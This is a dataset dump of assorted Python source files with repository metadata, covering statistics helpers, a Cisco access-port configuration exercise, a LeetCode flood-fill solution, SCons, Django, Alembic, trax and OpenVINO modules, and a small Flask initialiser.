""" Gets the standard error of the mean (essentially the standard deviation of the mean value; used to estimate its error margins) assuming sampling points are uncorrelated
Standard.Error = stdDev / sqrt(nSamples)
Args:
stdDev: (float) The standard deviation of the sample points
nSamples: (int) The number of sample points used
Returns
standardError: (float)
"""
return stdDev/math.sqrt(nSamples)
def calcVarianceOfData(inpData, besselCorr=False):
""" Calculate the variance for a set of data
Args:
inpData: (iter of floats)
besselCorr: (Bool) If true we multiply by n/n-1 instead of n; this leads to an unbiased estimate
Returns
variance: (float) The variance of the input data
Raises:
Errors
"""
if besselCorr:
raise NotImplementedError("")
mean = sum(inpData)/len(inpData)
outVal = (1/len(inpData)) * sum([(x-mean)**2 for x in inpData])
return outVal
def getStatsFromBlockingDataUpToMaxOrder(inpData, maxOrder):
""" Divides data into blocks of blockSize and calculates mean (should be constant between blocksizes assuming not much trimmed) and standard error. This should help in estimating the standard error for the mean for a correlated data set (see e.g. https://doi.org/10.1063/1.457480 or 10.1002/jcc.20746)
Args:
inpData: (iter of floats)
maxOrder: (int) We divide each block into two for each order. So maxOrder=0 just gets stats for input data unmodified; maxOrder=1 includes data where we average each pair of data points; maxOrder=4 we average every 4 data points etc.
Returns
outDicts: (iter of dicts) Contains various info for each order. Some shown belowish
"""
outDicts = list()
currOrder = 0
currBlock = inpData
while currOrder <= maxOrder:
#Sort out this order
currVar = calcVarianceOfData(currBlock) / (len(currBlock)-1)
currStdDev = math.sqrt(currVar)
currStdDevError = currStdDev * (1 / math.sqrt( 2*(len(currBlock)-1) ))
currMean = sum(currBlock)/len(currBlock)
currDict = {"order":currOrder, "mean":currMean, "mean_std_dev":currStdDev, "mean_std_dev_std_dev":currStdDevError}
outDicts.append(currDict)
#Block the data
currBlock = _getDataDividedIntoTwoBlocks(currBlock)
#Break if we cant block data further
if len(currBlock) < 2:
break
currOrder += 1
return outDicts
def _getDataDividedIntoTwoBlocks(inpData):
outData = list()
idx = 0
while idx<len(inpData)-1:
outData.append( (inpData[idx]+inpData[idx+1])/2 )
idx += 2
return outData
#Moving averages: At time of writing these are effectively tested in analyse_thermo
def getSimpleMovingAverage(inpData):
""" Gets the moving average of inpData at each point
Args:
inpData: (iter of floats) The input data
Returns
movingAvg: (iter of floats). Each data point is sum(prevPoints)/len(prevPoints) [i.e. the moving average]
Raises:
Errors
"""
currSum = 0
outVals = list()
for idx,val in enumerate(inpData, start=1):
currSum += val
currVal = currSum / idx
outVals.append(currVal)
return outVals
def getCentralWindowAverageFromIter(inpIter, widthEachSide, fillValWhenNotCalc=None):
""" Gets a central-window moving average for the input data (each mean value is calculated from n values either side)
Args:
inpIter: (iter of Numbers) We take the moving averages of these numbers
widthEachSide: (int) Number of data points to take each side when calculating the mean
fillValWhenNotCalc: The value we output when we cant calculate a central moving average (e.g. we cant get a moving average for the first or last data points)
Returns
outVals: (iter of float) Central moving average. Each data point is an average of 2*widthEachSide + 1 data points
"""
stack = list()
outVals = list()
lenIter = len(inpIter)
reqStackSize = 2*widthEachSide + 1
#Initialise our stack
stack = [x for x in inpIter[:widthEachSide]]
#Calculate moving averages
for idx,val in enumerate(inpIter):
#Deal with the stack
if len(stack) == reqStackSize:
stack.pop(0)
if idx < lenIter-widthEachSide:
stack.append(inpIter[idx+widthEachSide])
#Calculate moving average
if len(stack) < reqStackSize:
outVals.append(fillValWhenNotCalc)
else:
outVals.append( sum(stack)/len(stack) )
return outVals
| [
"richard.m.fogarty@gmail.com"
] | richard.m.fogarty@gmail.com |
d66cd14a44c84ce857dbb8881ecff6b60762089f | 035963a845a82223094f06e5f844d43d03d1cd6a | /exercises/09_functions/task_9_1.py | 033227c9674ca06f63a9311e51eea75962719b91 | [] | no_license | antonRTJ/pyneng-examples-exercises | 6699ab6e44769be40c1542ffc81152c14b70889c | 4422d320f52f3096c14adb0dffcc0db1d317841d | refs/heads/master | 2021-05-05T21:40:08.543998 | 2017-12-23T14:57:09 | 2017-12-23T14:57:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,274 | py | # -*- coding: utf-8 -*-
'''
Задание 9.1
Создать функцию, которая генерирует конфигурацию для access-портов.
Параметр access ожидает, как аргумент, словарь access-портов, вида:
{ 'FastEthernet0/12':10,
'FastEthernet0/14':11,
'FastEthernet0/16':17,
'FastEthernet0/17':150 }
Функция должна возвращать список всех портов в режиме access
с конфигурацией на основе шаблона access_template.
Заготовка для функции уже сделана.
В конце строк в списке не должно быть символа перевода строки.
Пример итогового списка:
[
'interface FastEthernet0/12',
'switchport mode access',
'switchport access vlan 10',
'switchport nonegotiate',
'spanning-tree portfast',
'spanning-tree bpduguard enable',
'interface FastEthernet0/17',
'switchport mode access',
'switchport access vlan 150',
'switchport nonegotiate',
'spanning-tree portfast',
'spanning-tree bpduguard enable',
...]
Проверить работу функции на примере словаря access_dict.
Ограничение: Все задания надо выполнять используя только пройденные темы.
'''
def generate_access_config(access):
'''
access - словарь access-портов,
для которых необходимо сгенерировать конфигурацию, вида:
{ 'FastEthernet0/12':10,
'FastEthernet0/14':11,
'FastEthernet0/16':17}
Возвращает список всех портов в режиме access с конфигурацией на основе шаблона
'''
access_template = ['switchport mode access',
'switchport access vlan',
'switchport nonegotiate',
'spanning-tree portfast',
'spanning-tree bpduguard enable']
access_dict = { 'FastEthernet0/12':10,
'FastEthernet0/14':11,
'FastEthernet0/16':17,
'FastEthernet0/17':150 }
| [
"nataliya.samoylenko@gmail.com"
] | nataliya.samoylenko@gmail.com |
9e6026334732b244406c434e8fd565792db49317 | 2da8bcfb9a72e507812a8723e38ad6d030c300f1 | /flood_fill_733.py | 3369a85ae7338dc21c709986a4025add7e344ac1 | [] | no_license | aditya-doshatti/Leetcode | 1a4e0f391a7d6ca2d7f8fdc35e535f4ec10fb634 | eed20da07896db471ea6582785335e52d4f04f85 | refs/heads/master | 2023-04-06T02:18:57.287263 | 2023-03-17T03:08:42 | 2023-03-17T03:08:42 | 218,408,346 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,846 | py | '''
733. Flood Fill
Easy
An image is represented by a 2-D array of integers, each integer representing the pixel value of the image (from 0 to 65535).
Given a coordinate (sr, sc) representing the starting pixel (row and column) of the flood fill, and a pixel value newColor, "flood fill" the image.
To perform a "flood fill", consider the starting pixel, plus any pixels connected 4-directionally to the starting pixel of the same color as the starting pixel, plus any pixels connected 4-directionally to those pixels (also with the same color as the starting pixel), and so on. Replace the color of all of the aforementioned pixels with the newColor.
At the end, return the modified image.
Example 1:
Input:
image = [[1,1,1],[1,1,0],[1,0,1]]
sr = 1, sc = 1, newColor = 2
Output: [[2,2,2],[2,2,0],[2,0,1]]
Explanation:
From the center of the image (with position (sr, sc) = (1, 1)), all pixels connected
by a path of the same color as the starting pixel are colored with the new color.
Note the bottom corner is not colored 2, because it is not 4-directionally connected
to the starting pixel.
https://leetcode.com/problems/flood-fill/
'''
class Solution:
def floodFill(self, image: List[List[int]], sr: int, sc: int, newColor: int) -> List[List[int]]:
if not image or len(image) == 0 : return 0
val = image[sr][sc]
if val == newColor:
return image
q = set({(sr,sc)})
while q:
curi, curj = q.pop()
image[curi][curj] = newColor
for i,j in ((-1,0), (0,-1), (0,1), (1,0)):
tempi ,tempj = curi + i, curj + j
if tempi >= 0 and tempi < len(image) and tempj >= 0 and tempj < len(image[tempi]):
if image[tempi][tempj] == val:
q.add((tempi, tempj))
return image
| [
"aditya.doshatti@sjsu.edu"
] | aditya.doshatti@sjsu.edu |
6d1783909b6899d68e06ba478dd41dfb7a7c831e | 72ce57d187fb6a4730f1390e280b939ef8087f5d | /nuitka/build/inline_copy/lib/scons-3.1.0/SCons/Tool/default.py | 866b823aa485784b0ff390b9219a74fe26efc8be | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | tommyli3318/Nuitka | c5b7681b73d96cb8859210ed1a78f09149a23825 | ae52b56024d53159a72a5acbfaac792ca207c418 | refs/heads/develop | 2020-05-02T17:02:10.578065 | 2019-10-27T15:53:32 | 2019-10-27T15:53:32 | 178,086,582 | 1 | 0 | Apache-2.0 | 2019-06-06T00:32:48 | 2019-03-27T22:53:31 | Python | UTF-8 | Python | false | false | 1,753 | py | """SCons.Tool.default
Initialization with a default tool list.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2019 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/default.py e724ae812eb96f4858a132f5b8c769724744faf6 2019-07-21 00:04:47 bdeegan"
import SCons.Tool
def generate(env):
"""Add default tools."""
for t in SCons.Tool.tool_list(env['PLATFORM'], env):
SCons.Tool.Tool(t)(env)
def exists(env):
return 1
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| [
"kay.hayen@gmail.com"
] | kay.hayen@gmail.com |
e2d0a203ca2e2382431176af8da1ed0ab9efec5b | b18ff1d2a88cdad6d8ca73a8e6c34943f7bee055 | /toolcall/defaults.py | dd6bd85611e6c66052de01dc4bd15b7306bd76f2 | [
"MIT"
] | permissive | thebjorn/toolcall | 9c812d608a67990dfb04b4e8bc1ebfcd4e7440c3 | 2c1597c8224958b4751cfb09f7a1b4439ca6df09 | refs/heads/master | 2021-06-13T21:33:12.495795 | 2019-08-31T10:50:55 | 2019-08-31T10:50:55 | 147,824,176 | 0 | 0 | MIT | 2021-06-10T20:46:47 | 2018-09-07T13:02:31 | HTML | UTF-8 | Python | false | false | 884 | py | # -*- coding: utf-8 -*-
from django.conf import settings
def _get(attr, default=None):
return getattr(settings, attr, default)
if settings.DEBUG:
TOOLCALL_TOKEN_TIMEOUT_SECS = 200
else:
TOOLCALL_TOKEN_TIMEOUT_SECS = _get('TOOLCALL_TOKEN_TIMEOUT_SECS', 10)
TOOLCALL_TOKEN_SIZE = _get('TOOLCALL_TOKEN_SIZE', 51)
TOOLCALL_ERROR_RESTART_URL = _get('TOOLCALL_ERROR_RESTART_URL', "https://www.finaut.no/")
TOOLCALL_SERVICE_ROOT_URL = _get('TOOLCALL_SERVICE_ROOT_URL', "https://afr.norsktest.no/toolcall/")
TOOLCALL_START_URL = 'starturl'
TOOLCALL_STAGING_START_URL = 'starturl'
TOOLCALL_SUCCESS_URL = _get('TOOLCALL_SUCCESS_URL', "http://www.autorisasjonsordningen.no/profile/")
TOOLCALL_FAIL_URL = _get('TOOLCALL_FAIL_URL', "http://www.autorisasjonsordningen.no/profile/")
TOOLCALL_RENEW_TOKEN_URL = 'renew-token-url'
TOOLCALL_STAGING_RESULT_DATA = 'staging-result-data'
| [
"bp@datakortet.no"
] | bp@datakortet.no |
3d7613ea2ecad847eb249f75b64eded8a16d31ab | ad5b72656f0da99443003984c1e646cb6b3e67ea | /tools/mo/openvino/tools/mo/back/LinearToLinearONNXReplacer.py | 7c11672b5a3d3b1b997226463cc4bbc43fa7919e | [
"Apache-2.0"
] | permissive | novakale/openvino | 9dfc89f2bc7ee0c9b4d899b4086d262f9205c4ae | 544c1acd2be086c35e9f84a7b4359439515a0892 | refs/heads/master | 2022-12-31T08:04:48.124183 | 2022-12-16T09:05:34 | 2022-12-16T09:05:34 | 569,671,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,346 | py | # Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from openvino.tools.mo.back.InterpolateReshape import InterpolateConcat, InterpolateReshapeWA
from openvino.tools.mo.back.replacement import BackReplacementPattern
from openvino.tools.mo.graph.graph import Graph
class LinearToLinearONNXReplacer(BackReplacementPattern):
"""
If we don't use this transformation, then we have a performance drop, because CPU and GPU have no optimized
version of the 'linear' mode of the operation Interpolate.
TODO: delete this transformation, when CPU and GPU will have optimized version of the 'linear' mode.
"""
enabled = True
def run_after(self):
return [InterpolateConcat, InterpolateReshapeWA]
def find_and_replace_pattern(self, graph: Graph):
for interpolate_node in graph.get_op_nodes(type='Interpolate', version='opset4', mode='linear'):
input_shape = interpolate_node.in_port(0).data.get_shape()
interpolate_name = interpolate_node.soft_get('name', interpolate_node.id)
assert input_shape is not None, \
'Shape of interpolated data for node {} must not be None'.format(interpolate_name)
input_rank = len(input_shape)
if input_rank == 4:
interpolate_node['mode'] = 'linear_onnx'
| [
"noreply@github.com"
] | novakale.noreply@github.com |
c7fcf71168896ce7ef086bfebc45389f64281412 | e63132f40675ca4f37af653952cac27649e5b548 | /trax/trainer_flags.py | 0ebb9edef726abfa30976eb25c44d82239609bdb | [
"Apache-2.0"
] | permissive | Dithn/trax | 9286b265741700e4e52044c50c01e01f70bf739e | c6513908602e934e5472f299851d84a53c8afcff | refs/heads/master | 2023-04-09T19:15:13.663285 | 2021-04-27T00:14:29 | 2021-04-27T00:15:41 | 234,445,011 | 0 | 0 | Apache-2.0 | 2021-04-27T11:37:58 | 2020-01-17T01:25:16 | Python | UTF-8 | Python | false | false | 3,647 | py | # coding=utf-8
# Copyright 2021 The Trax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Flags for trainer.py and rl_trainer.py.
We keep these flags in sync across the trainer and the rl_trainer binaries.
"""
from absl import flags
from absl import logging
# Common flags.
flags.DEFINE_string('output_dir',
None,
'Path to the directory to save logs and checkpoints.')
flags.DEFINE_multi_string('config_file',
None,
'Configuration file with parameters (.gin).')
flags.DEFINE_multi_string('config',
None,
'Configuration parameters (gin string).')
# TPU Flags
flags.DEFINE_bool('use_tpu', False, "Whether we're running on TPU.")
flags.DEFINE_string('jax_xla_backend',
'xla',
'Either "xla" for the XLA service directly, or "tpu_driver"'
'for a TPU Driver backend.')
flags.DEFINE_string('jax_backend_target',
'local',
'Either "local" or "rpc:address" to connect to a '
'remote service target.')
# trainer.py flags.
flags.DEFINE_string('dataset', None, 'Which dataset to use.')
flags.DEFINE_string('model', None, 'Which model to train.')
flags.DEFINE_string('data_dir', None, 'Path to the directory with data.')
flags.DEFINE_integer('log_level', logging.INFO, 'Log level.')
# TensorFlow Flags
flags.DEFINE_bool('enable_eager_execution',
True,
"Whether we're running TF in eager mode.")
flags.DEFINE_bool('tf_xla', True, 'Whether to turn on XLA for TF.')
flags.DEFINE_bool('tf_opt_pin_to_host',
False,
'Whether to turn on TF pin-to-host optimization.')
flags.DEFINE_bool('tf_opt_layout',
False,
'Whether to turn on TF layout optimization.')
flags.DEFINE_bool('tf_xla_forced_compile',
False,
'Use forced-compilation instead of auto-clustering for XLA.'
'This flag only has effects when --tf_xla is on.')
flags.DEFINE_bool('tf_allow_float64', False, 'Whether to allow float64 for TF.')
# rl_trainer.py flags.
flags.DEFINE_boolean('jax_debug_nans',
False,
'Setting to true will help to debug nans and disable jit.')
flags.DEFINE_boolean('disable_jit', False, 'Setting to true will disable jit.')
flags.DEFINE_string('envs_output_dir', '', 'Output dir for the envs.')
flags.DEFINE_bool('xm', False, 'Copy atari roms?')
flags.DEFINE_integer('train_batch_size',
32,
'Number of parallel environments during training.')
flags.DEFINE_integer('eval_batch_size', 4, 'Batch size for evaluation.')
flags.DEFINE_boolean('parallelize_envs',
False,
'If true, sets parallelism to number of cpu cores.')
flags.DEFINE_string('trajectory_dump_dir',
'',
'Directory to dump trajectories to.')
flags.DEFINE_bool('async_mode', False, 'Async mode.')
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
f627b1a808d5fa423185b2663584494a0ea59c6d | ff3830556ac86e9f92f8d85379bb8099cff014bd | /application/__init__.py | 5e1224c74053c1fc36922c5780c3dc33e58c72f0 | [] | no_license | tarvitz/test-work | f34153cd794842ea7b479d6b2b3226e65cd03feb | e35e0248cddcaf3d0a59ae7ad87883c146829809 | refs/heads/master | 2016-09-05T11:14:40.147068 | 2014-07-07T10:33:39 | 2014-07-07T10:33:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | # coding: utf-8
"""
Initialize Flask app
"""
from flask import Flask
app = Flask(__name__)
app.config.update({
'OBJECTS_ON_PAGE': 20
})
# Pull in URL dispatch routes
import urls | [
"tarvitz@blacklibrary.ru"
] | tarvitz@blacklibrary.ru |
72da1a452e300f4724452c7911137f4739eabc26 | 09d564aaab98f72dce6585e78a0642c9fe3539f4 | /python_xy/test.py | c6d52baf251d2a569af71a4aa24c5d7067ea144d | [] | no_license | everydayxy/xy_py | 4b983b4bccc843602f1ea0b1d5ea9576119604bf | 08b314e7ecb10e13394aa93b92084c53596834f3 | refs/heads/master | 2020-04-03T08:52:44.729729 | 2019-09-20T15:05:35 | 2019-09-20T15:05:35 | 134,683,779 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 952 | py | # #!/usr/bin/env python
# # coding:utf8
#
# f = open('xuqiu20181029.csv','r')
# new_dict = {}
# for line in f:
# parts = line.split('|')
# if int(parts[11]) == 2:
# if parts[2] in new_dict:
# new_dict[parts[2]] += int(parts[10])
# else:
# new_dict[parts[2]] = int(parts[10])
#
#
# for k,v in new_dict.items():
# if v > 6000:
# print(k,v)
# a = [[1, 2], [3, 4], [5, 6]]
# b = [x for l in a for x in l]
# print(b)
# a = [[1, 2], [3, 4], [5, 6]]
# flatten = lambda x: [y for l in x for y in flatten(l)] if type(x) is list else [x]
# print(flatten(a))
#
# def flatten(x):
# new_lst = []
# if type(x) is list:
# for l in x:
# for y in flatten(l):
# new_lst.append(y)
# else:
# new_lst = [x]
# return new_lst
# a = [[1, 2], [3, 4], [5, 6]]
# b = flatten(a)
# print(b)
a = 2222.123
print('{:.2f}'.format(a))
a = 'Henry'
print(f"{a}") | [
"everydayx@163.com"
] | everydayx@163.com |
d2429aa83f66ddc5d8393ba6fb8f875d920982e7 | e2eb7237ba115b18d9dde7fedf35f7c6387f6e2a | /wwp/migrations/versions/fe4855cc93a7_.py | dfa5c7cc5f68dd3b042aae08a83f19ee057836d3 | [] | no_license | dr-hemam/colp1 | 7854398958a43b4d5db708ff6b324c415c117eb2 | 7aab3587a9c4c4ec9442d92d26b175ae8f4fa40c | refs/heads/master | 2020-03-16T13:59:21.948476 | 2018-05-09T05:18:31 | 2018-05-09T05:18:31 | 132,704,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 900 | py | """empty message
Revision ID: fe4855cc93a7
Revises: 9f00a5849e88
Create Date: 2017-06-09 09:00:03.546084
"""
# revision identifiers, used by Alembic.
revision = 'fe4855cc93a7'
down_revision = '9f00a5849e88'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('constraintanalysis_details', 'id',
existing_type=mysql.INTEGER(display_width=11),
nullable=True,
autoincrement=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('constraintanalysis_details', 'id',
existing_type=mysql.INTEGER(display_width=11),
nullable=False,
autoincrement=True)
# ### end Alembic commands ###
| [
"hassan.emam@hotmail.com"
] | hassan.emam@hotmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.